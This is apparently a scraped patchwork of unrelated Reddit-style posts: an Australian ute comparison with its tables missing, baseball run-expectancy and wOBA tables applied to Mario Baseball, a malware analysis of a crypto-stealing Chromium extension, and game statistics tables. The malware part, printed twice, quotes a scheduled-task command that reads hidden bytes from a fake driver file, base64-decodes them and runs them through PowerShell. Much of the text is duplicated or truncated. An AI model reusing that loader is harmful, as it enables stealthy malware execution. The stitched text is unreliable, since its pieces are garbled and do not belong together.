So I have been thinking long and hard about the best way to structure this post due to the large number of questions and conversations that have been had on the subreddit over the last few days especially because there have been a number of articles put out by the lamestream media in regards to utilities and how they are judged.

submitted by That_Car_Dude_Aus to CarsAustralia

So I thought I would do this post across a number of metrics. So this is an on-paper comparison between utes. Some ground rules:
On the shitlist too are:
And Isuzu and Mitsubishi Trucks are on the shitlist because I had to call them to get pricing. Ford is on the shitlist as I have to call them to talk to a "Ranger expert". Go fuck yourselves. I want data, not conversation. The eCanter Price was Estimated by CarSales, Mitsubishi refuses to give me a price, and when I called just said “Come in and we’ll discuss pricing”....I'm not driving 60km into town to get a price. Mitsubishi also didn't like the idea of it being downgraded to a car licence, and said it would be 4,495kg "if head office lets us" Further, the 79 Series pricing and specs is unavailable, and even calling Toyota refused to give even the base prices, or a “Starting From” price and they even refused to email me a spec sheet. Seems Toyota has just shut down any info on the current 79’s that are being made and delivered because the new model is coming. Finally, the eT60 has no declared GCM. The chat on the website told me to call a dealer and hand over my details, in the end I called my dealer and all he had in front of him was a GCM that seemed to be copy and pasted of 4,050kg which is the GVM. So if you load it up, you can't tow. Any accessories such as a bullbar take away from your 1,000kg tow capacity. Admittedly, I got to the point where if I couldn't find the data on the manufacturer website, I threw my hands up and went "Fuck it, they don't care about consumers" and gave up. Hence, this is the list when I could get all the relevant data without being fucked around. Anyway, the table: In case Reddit fucks up the table The Table in full, if the Reddit table stuff fucks it up
So, that's a lot of Data, so let's do some sorting!

Top 5 Utes by Payload!
Worst 5 Utes by Payload
Best Real Towing Capacity
Worst Real Towing Capacity
Best Economy

I would just like to caveat that some manufacturers posted Urban, some only posted combined, some didn't say what their number was from

Electric
Worst Economy
Best Range
Worst Range
Most pathetic power
MOST POWAAAAAAAAAAAAAAAAAAHHHHHHHHH
Weakest tugs
Best to Tug
How Many Body Parts do you need to sell?

Please note that this was another area where Manufacturers liked to Cherry pick data, I am 110% sure that RAM prices are before taxes, and some are Driveaway, that doesn't change the picture too much, as you'll see:

Cheapest

ACE Yewt - $25,995
Best $/kg - Payload
Worst $/kg - Payload
Best $/kg - Towing
Worst $/kg Towing
Most Expensive to Haul Anything $/kg

This is a metric of how much you can haul versus the cost of the vehicle, ergo, these cars are super expensive per kg you can carry and tow
Cheapest Haulers $/kg
Most Powerful for GCM
Least Powerful for GCM
Highest Torque for GCM
Lowest Torque for GCM
Summary

If you spend your day crunching numbers, you'll be like me and spend hours staring at spreadsheets

Honestly, best ute is the one you like, with the least issues. I wouldn't buy half of the Utes on the list for many reasons. I'm sick of spreadsheets.
| Runners | 0 out | 1 out | 2 out |
|---|---|---|---|
| -- -- -- | 0.476 | 0.254 | 0.097 |
| 1B -- -- | 0.865 | 0.508 | 0.205 |
| -- 2B -- | 1.073 | 0.667 | 0.308 |
| -- -- 3B | 1.272 | 0.974 | 0.377 |
| 1B 2B -- | 1.435 | 0.902 | 0.440 |
| 1B -- 3B | 1.753 | 1.147 | 0.500 |
| -- 2B 3B | 2.005 | 1.390 | 0.548 |
| 1B 2B 3B | 2.367 | 1.508 | 0.767 |

To read this, you would say that at any point in an inning where a team has runners on 1st and 2nd with 1 out, we can, without context, expect them to score an average of .902 runs. To derive these values from scratch, you have to find each time that each of these states happens, add up all the runs that get scored from that point in the inning until the batting team gets 3 outs, then divide by the number of times that state happened. So to make a quick example, let's say there were 25 occurrences in a given year where there were bases loaded and 1 out. We'll say that teams scored a total of 38 runs after that base-out state occurred. 38 runs/25 occurrences = 1.520 expected runs from the bases loaded, 1 out state. There are way more occurrences for each of these states in reality, so we can be pretty confident they're giving us decent expectations.
| Runners | 0 Outs | 1 Out | 2 Out |
|---|---|---|---|
| -- -- -- | 0.702 | 0.380 | 0.153 |
| 1B -- -- | 1.144 | 0.655 | 0.297 |
| -- 2B -- | 1.284 | 0.885 | 0.447 |
| -- -- 3B | 1.608 | 1.111 | 0.499 |
| 1B 2B -- | 1.712 | 1.071 | 0.493 |
| 1B -- 3B | 1.904 | 1.255 | 0.641 |
| -- 2B 3B | 2.165 | 1.506 | 0.703 |
| 1B 2B 3B | 2.588 | 1.656 | 0.807 |

When you get this thing filled out, you're able to do cool things like find out the expected run value of a given event. When Nick Pivetta takes the rubber in the top of the 1st on an otherwise nice summer day in Boston and walks the first batter of the game again, the opposing team has moved their run expectancy for the inning from 0.476 to 0.865 (+.389). When he gives up a double to the next batter before you've even found your seat and there's runners on 2nd and 3rd with 0 outs, the opposing team has moved from 0.865 to 2.005 (+1.140). Right when you sit down next to 3 drunk 19 year olds he gives up another double that drives in two runs that moves their expectancy from 2.005 to 1.073 (-0.932 + 2 runs scored = +1.068). But wait -- the value of the first double (1.140) is different from the value of the second double (1.068). What's the true value of a double? This chart just gives the expected value of a base-out state, but let's determine those values next.
BB: .689 HBP: .720 1B: .884 2B: 1.261 3B: 1.601 HR: 2.072

2022 Mario Baseball Linear Weights
BB/HBP: .724 1B: .808 2B: 1.189 3B: 1.453 HR: 1.982

These charts don't include every possible outcome of an at bat. You can reach by error, hit into a double play, hit a sac fly, bunt, or get any of these outcomes in any number of ways (flying out to the center field warning track probably has a slightly better value than hitting a soft ground ball to the shortstop) -- when you look up Fangraphs wRC+ values, you're probably seeing a value that is incorporating a bit more batted-ball info into its algorithm. This is the core and is absolutely good enough for shitposting in the offseason.
| Outcome | Count | Weight | Sum of value |
|---|---|---|---|
| bb | 130 | 0.689 | 89.57 |
| hbp | 6 | 0.72 | 4.32 |
| 1b | 87 | 0.884 | 76.91 |
| 2b | 28 | 1.261 | 35.31 |
| 3b | 0 | 1.601 | 0 |
| hr | 62 | 2.072 | 128.46 |
| | | | 334.57 |
| pa | 696 | | |

wOBA: 0.480

Judge's true wOBA this year was .458, so we're a tad off, but that's close enough for me to chalk the difference up to not incorporating park factors, double plays, and other types of PA outcomes.
| Outcome | Count | Weight | Sum of value |
|---|---|---|---|
| bb&hbp | 260 | 0.724 | 188.24 |
| single | 36 | 0.808 | 29.09 |
| double | 39 | 1.189 | 46.37 |
| triple | 2 | 1.453 | 2.91 |
| HR | 66 | 1.982 | 130.81 |
| | | | 397.42 |
| pa | 696 | | |

wOBA: 0.571

Being hit by a pitch is how most players walk their opponents intentionally in Mario Baseball, so the values are the same for a walk or hbp.
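| Outcome | Count | Weight | Sum of value |
|---|---|---|---|
| bb | 136 | 0.724 | 98.464 |
| 1b | 87 | 0.808 | 70.296 |
| 2b | 28 | 1.189 | 33.292 |
| 3b | 0 | 1.453 | 0 |
| hr | 62 | 1.982 | 122.884 |
| | | | 324.936 |
| pa | 696 | | |

wOBA: 0.4668

Bowser in the MLB: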
| Outcome | Count | Weight | Sum of value |
|---|---|---|---|
| bb+hbp | 260 | 0.689 | 179.14 |
| 1b | 36 | 0.884 | 31.824 |
| 2b | 39 | 1.261 | 49.179 |
| 3b | 2 | 1.601 | 3.202 |
| hr | 66 | 2.072 | 136.752 |
| | | | 400.097 |
| pa | 696 | | |

wOBA: 0.5748

Judge wRC+ in Mario Baseball: (.4668-.4148/1.0316)/.1757 = .2868 +1 = 1.2868 *100 = 128.7 wRC+ (compared to Bowser's 186.2)

A wRC+ of 128 is just above King Boo's 127 and just under Donkey Kong's 130. 6th overall among all characters.
As you can see, there's a bunch of Chrome and Edge (which are both derived from Chromium) browser extension files that are marked as Trojans, albeit BitcoinMiner as opposed to the BitcoinStealer system32 file. Don't be fooled by that, though. While it's true that antivirus software often labels harmless crypto software as malicious, in this particular case we weren't actually dealing with a legitimate mining extension but a malicious stealing one instead. The user had never installed any mining or crypto-related extensions.
And running that file seems to install the extensions on your Chromium-based browsers. Firefox-based browsers seem to be not affected by this. We figured this out when we were testing if the malware replaced the address in the Tor Browser (based on Firefox) too. It didn't, and no malicious extensions seem to have been present in the Tor browser. However, this is simply because the malware doesn't contain any Firefox extension, as opposed to some built in Firefox security feature. This is an important distinction to make, since Firefox is widely considered to be a secure browser by the general public despite being way behind Chromium in security according to some of the most prominent security researchers in the industry.

Internet, Health \Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975 true PT59M true PT59M HighestAvailable AA-SURFACE\amer0 InteractiveToken Parallel false false false false false true true false true PT0S 1 wscript.exe /e:vbscript /b "C:\Windows\System32\zYYdBt3ZQs\4AA2C936-A6E9-4413-9AA4-72BE7EF9CFC4" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\QoToP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.sys'), 2183100, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"
| | EX1 | EX2 | EX3 | EX4 |
|---|---|---|---|---|
| Moves | 33 | 38 | 43 | 66 |
| Tight moves | 3 | 5 | 5 | 20 |
| Observations | 23 | 25 | 25 | 24 |
| Role-based moves | 0 | 6 | 8 | 19 |
| Team-killing moves | 0 | 5 | 3 | 17 |
| Wiping moves | 0 | 0 | 1 | 2 |

| | P1S | P2S | ShB EX4 |
|---|---|---|---|
| Moves | 21 | 26 | 30 |
| Tight moves | 2 | 10 | 8 |
| Observations | 9 | 14 | 14 |
| Role-based moves | 11 | 13 | 6 |
| Team-killing moves | 4 | 13 | 0 |
| Wiping moves | 5 | 9 | 2 |
And running that file seems to install the extensions on your Chromium-based browsers. Firefox-based browsers seem not to be affected by this. We figured this out when we were testing if the malware replaced the address in the Tor Browser (based on Firefox) too. It didn't, and no malicious extensions seem to have been present in the Tor Browser. However, this is simply because the malware doesn't contain any Firefox extension, as opposed to some built-in Firefox security feature. This is an important distinction to make, since Firefox is widely considered to be a secure browser by the general public despite being way behind Chromium in security according to some of the most prominent security researchers in the industry.

Internet, Health \Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975 true PT59M true PT59M HighestAvailable AA-SURFACE\amer0 InteractiveToken Parallel false false false false false true true false true PT0S 1

```
wscript.exe /e:vbscript /b "C:\Windows\System32\zYYdBt3ZQs\4AA2C936-A6E9-4413-9AA4-72BE7EF9CFC4" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\QoToP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.sys'), 2183100, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"
```
Mission | Critical Failure | Failure | Success | Critical Success |
---|---|---|---|---|
Assassinate | 5 | 0 | 10 | 0 |
Control Space Asset | 2 | 2 | 7 | 7 |
Seize Space Asset | 2 | 2 | 10 | 10 |
Coup | 3 | 0 | 5 | 5 |
Crackdown | 0 | 0 | 2 | 0 |
Detain | 1 | 1 | 2 | 3 |
Extract Councilor | 0 | 0 | 1 | 1 |
Hostile Takeover | 1 | 0 | 2 | 2 |
Purge | 1 | 1 | 5 | 5 |
Sabotage Facilities | 2 | 0 | 3 | 0 |
Sabotage Hab Module | 2 | 2 | 0 | 0 |
Sabotage Project | 2 | 0 | 3 | 0 |
Steal Project | 2 | 0 | 3 | 0 |
Turn Councilor | 3 | 3 | 0 | 0 |
Cause Unrest | 2 | 0 | 0 | 0 |
Dominate Nation | 30 | 20 | 5 | 5 |
Assault Alien Asset * | 2 | 2 | 10 | 10 |